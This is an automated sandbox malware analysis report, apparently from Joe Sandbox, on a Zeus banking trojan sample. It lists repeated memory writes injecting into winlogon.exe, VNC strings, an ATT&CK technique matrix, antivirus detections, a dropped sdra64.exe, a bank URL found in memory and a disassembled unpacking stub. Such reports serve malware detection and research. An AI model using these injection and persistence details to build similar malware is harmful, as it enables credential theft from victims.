Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D459000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D45B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D460000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D461000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D476000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D479000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D47B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D480000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D481000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D496000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D499000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D49B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4A0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4A1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4B6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4B9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4BB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4C0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4C1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4D6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4D9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4DB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4E0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4E1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4F6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4F9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4FB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D500000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D501000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D516000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D519000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D51B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D520000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D521000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D536000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D539000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D53B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D540000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D541000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D556000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D559000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D55B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D560000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D561000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D576000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D579000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D57B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D580000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D581000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D596000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D599000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D59B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00414AEA InitializeSecurityDescriptor,SetSecurityDescriptorDacl,0_2_00414AEA
Source: P8jE8nmN7G.exe, 00000000.00000002.464571349.0000000000DB0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.196746478.000002388D3F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: P8jE8nmN7G.exe, winlogon.exe, 00000002.00000000.196746478.000002388D3F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: P8jE8nmN7G.exe, 00000000.00000002.464571349.0000000000DB0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.196746478.000002388D3F0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: P8jE8nmN7G.exe, 00000000.00000002.464571349.0000000000DB0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.196746478.000002388D3F0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040B231 CreateNamedPipeW,CreateEventW,CreateEventW,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,0_2_0040B231
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040486E PFXImportCertStore,GetSystemTime,wnsprintfW,lstrcatW,0_2_0040486E
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040B585 HeapCreate,GetProcessHeap,GetCurrentProcessId,IsBadHugeReadPtr,GetUserDefaultUILanguage,GetUserNameW,0_2_0040B585
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040F1C9 GetTimeZoneInformation,0_2_0040F1C9
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00414BBB GetTickCount,GetVersionExW,GetUserDefaultUILanguage,GetModuleFileNameW,0_2_00414BBB
Source: P8jE8nmN7G.exe, 00000000.00000002.465097863.00000000025DF000.00000004.00000040.sdmpBinary or memory string: zlclient.exe

Remote Access Functionality:

barindex
Contains VNC / remote desktop functionality (version string found)Show sources
Source: P8jE8nmN7G.exeString found in binary or memory: RFB 003.003
Source: P8jE8nmN7G.exeString found in binary or memory: RFB 003.003
Source: P8jE8nmN7G.exe, 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmpString found in binary or memory: A@dA@RFB 003.003
Source: winlogon.exe, 00000002.00000002.473149033.000000000E0E1000.00000040.00000001.sdmpString found in binary or memory: RFB 003.003
Source: winlogon.exe, 00000002.00000002.463379411.0000000000401000.00000040.00000001.sdmpString found in binary or memory: A@dA@RFB 003.003
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0041090B socket,bind,closesocket,0_2_0041090B
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004105F2 socket,bind,listen,closesocket,0_2_004105F2

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Native API1DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information2Input Capture21System Time Discovery2Remote Desktop Protocol1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsScheduled Task/JobApplication Shimming1Application Shimming1Install Root Certificate1LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture21Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Create Account1Valid Accounts1Software Packing13Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Valid Accounts1Access Token Manipulation11DLL Side-Loading1NTDSSystem Information Discovery3Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronRegistry Run Keys / Startup Folder1Process Injection42Masquerading2LSA SecretsSecurity Software Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder1Valid Accounts1Cached Domain CredentialsVirtualization/Sandbox Evasion1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion1DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation11Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection42/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
P8jE8nmN7G.exe80%VirustotalBrowse
P8jE8nmN7G.exe96%ReversingLabsWin32.Trojan.Zeus
P8jE8nmN7G.exe100%AviraTR/Dropper.Gen
P8jE8nmN7G.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Windows\SysWOW64\sdra64.exe100%AviraTR/Dropper.Gen
C:\Windows\SysWOW64\sdra64.exe100%Joe Sandbox ML

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
2.2.winlogon.exe.d6a0000.108.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d1a0000.68.unpack100%AviraTR/Crypt.XPACK.GenDownload File
0.1.P8jE8nmN7G.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
2.2.winlogon.exe.d8a0000.124.unpack100%AviraTR/Crypt.XPACK.GenDownload File
0.2.P8jE8nmN7G.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fa60000.394.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10760000.498.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d740000.113.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f440000.345.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d1c0000.69.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10800000.503.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.eaa0000.268.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e060000.186.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fae0000.398.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.100c0000.445.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.dfa0000.180.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f260000.330.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e5e0000.230.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e480000.219.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fa40000.393.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.dfe0000.182.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fa80000.395.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.106c0000.493.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e660000.234.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e7c0000.245.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ed20000.288.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f920000.384.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fd20000.416.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ebe0000.278.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d5a0000.100.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fb80000.403.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.efa0000.308.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d2e0000.78.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f420000.344.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f540000.353.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f580000.355.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e7e0000.246.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.c960000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e360000.210.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d960000.130.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10160000.450.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e6e0000.238.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f9e0000.390.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f9a0000.388.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.db00000.143.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.eac0000.269.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cfe0000.54.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ce40000.41.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10620000.488.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d040000.57.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e9a0000.260.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10960000.514.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ca00000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.102c0000.461.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d880000.123.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cbc0000.21.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10720000.496.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d7a0000.116.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.df20000.176.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.efe0000.310.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10680000.491.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f1a0000.324.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f960000.386.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.103e0000.470.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ea40000.265.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cc80000.27.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f720000.368.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.dc40000.153.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cf60000.50.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10280000.459.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ec40000.281.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cea0000.44.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f2e0000.334.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e880000.251.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e3a0000.212.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ca60000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10300000.463.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fbe0000.406.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f940000.385.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f240000.329.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.108e0000.510.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f400000.343.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e0e0000.190.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d140000.65.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cba0000.20.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.100e0000.446.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f5e0000.358.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10460000.474.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e720000.240.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e940000.257.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e620000.232.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fec0000.429.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fd00000.415.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d9a0000.132.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.eb20000.272.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cb80000.19.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d940000.129.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f460000.346.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.de00000.167.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://onlineeast#.bankofamerica.com/cgi-bin/ias/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://onlineeast#.bankofamerica.com/cgi-bin/ias/P8jE8nmN7G.exe, 00000000.00000002.464936104.0000000002563000.00000004.00000040.sdmpfalse
  • Avira URL Cloud: safe
low

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:409287
Start date:09.05.2021
Start time:20:35:16
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 6s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:P8jE8nmN7G (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:23
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.evad.winEXE@1/2@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 87.2% (good quality ratio 82.8%)
  • Quality average: 83.4%
  • Quality standard deviation: 27.7%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Windows\SysWOW64\sdra64.exe
Process:C:\Users\user\Desktop\P8jE8nmN7G.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):960512
Entropy (8bit):7.4471687140914185
Encrypted:false
SSDEEP:24576:+Vy+qcRpdmAA4xiaUG5al4+0JgF8VDn50JTJtFW1a7wt:V+tTmIzD4O+4gF+5Qjka7+
MD5:8834EA3D0BD0092967199887FAA44929
SHA1:411441B2883B67FECDC085B6E5F7E7F51D68AA90
SHA-256:2C3A335C1B7760346149BEC5BE904E9DD6289E18C81A5264E5C8C073D58DDE03
SHA-512:42E28B003961CC94D9F26AE5C347AD972A45283B4213123F818BC4F76829E54BC33C22ACD92BEBA3EE4A22E5FFC82163F9FBB4E82BA9DB6E68C051DB840D6CDE
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........".R.C...C...C..Zg2..C..4...C..N.F..C...)0..C..|...GC..Rich.C..................................................................PE..L....G0G................. ...v......Tt.......0....@..........................................................................5..x....................................................................................0...............................text............ .................. ..`.rdata..@#...0...$...$..............@..@.data...}P...`.......H..............@...........................................................................................................................................................................................................................................................................................................................................................................................
C:\Windows\SysWOW64\sdra64.exe:Zone.Identifier
Process:C:\Users\user\Desktop\P8jE8nmN7G.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Reputation:high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.463091044475583
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.83%
  • Windows Screen Saver (13104/52) 0.13%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:P8jE8nmN7G.exe
File size:602112
MD5:ac514dce9416eb9e4148431016629174
SHA1:b0e1d96605cdc3da995a667a1fdc7189b67bfdcd
SHA256:67334c1b7f629c04efefbfb466e5996a425af4a43c07a5ce51d4f142222b0de7
SHA512:8c485630cae11e23c5eb790aa061681fe161ea390e07731ea7742a9f029806f43eb432eb08af280b301e889a6b4932ae6c6b436b8d78afb333e5cf0ba8e8907a
SSDEEP:12288:+VZuL+Kd3LSbFPFX3PL2w5+9naFA4xixYUSl5alHY+0JgKsOaRC:+Vy+qcRpdmAA4xiaUG5al4+0JgFU
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........".R.C...C...C..Zg2..C..4....C..N.F..C...)0..C..|...GC..Rich.C.................................................................

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x407454
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x4730479C [Tue Nov 6 10:53:16 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:fbbf51b163121df5cf4fc9419aafa3af

Entrypoint Preview

Instruction
call 00007FE68087D0EBh
xor edi, edi
pop esi
retn 0028h
xor esi, esi
push 0000000Eh
push 00681494h
push 00FFFE7Ch
push 00000001h
push 00AAC0FBh
push 00000000h
call dword ptr [004130FCh]
mov edx, eax
or edx, 000000BEh
add esi, edx
push edx
push 00000000h
call dword ptr [00413100h]
pop ebx
cmp esi, 08407BE0h
jnl 00007FE68087D0E4h
jmp 00007FE68087D0A9h
mov eax, 0001362Fh
add eax, 5Bh
mov ecx, edx
sub esp, 04h
mov dword ptr [esp], ecx
sub esp, 04h
mov dword ptr [esp], 00000040h
sub esp, 04h
mov dword ptr [esp], 00003000h
push eax
sub esp, 04h
mov dword ptr [esp], 00000000h
call dword ptr [004130F8h]
pop ecx
mov ecx, esi
mov esi, dword ptr [esp]
mov edi, eax
add esi, 000000F3h
push eax
mov ecx, 000001E6h
mov edx, 137D02D9h
mov ebp, 00000000h
mov bh, dl
add bh, byte ptr [esi]
add esi, 01h
mov byte ptr [edi], bh
add byte ptr [edi], bl
add edi, 01h
sub esp, 04h
mov dword ptr [esp], edx
sub esp, 04h
mov dword ptr [esp], ecx
push 0000001Dh
push 0000001Eh
push 00FFFC60h
push 00000005h
push 006D2D0Ch
push 00000000h
call dword ptr [000000FCh]

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x135c80x78.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
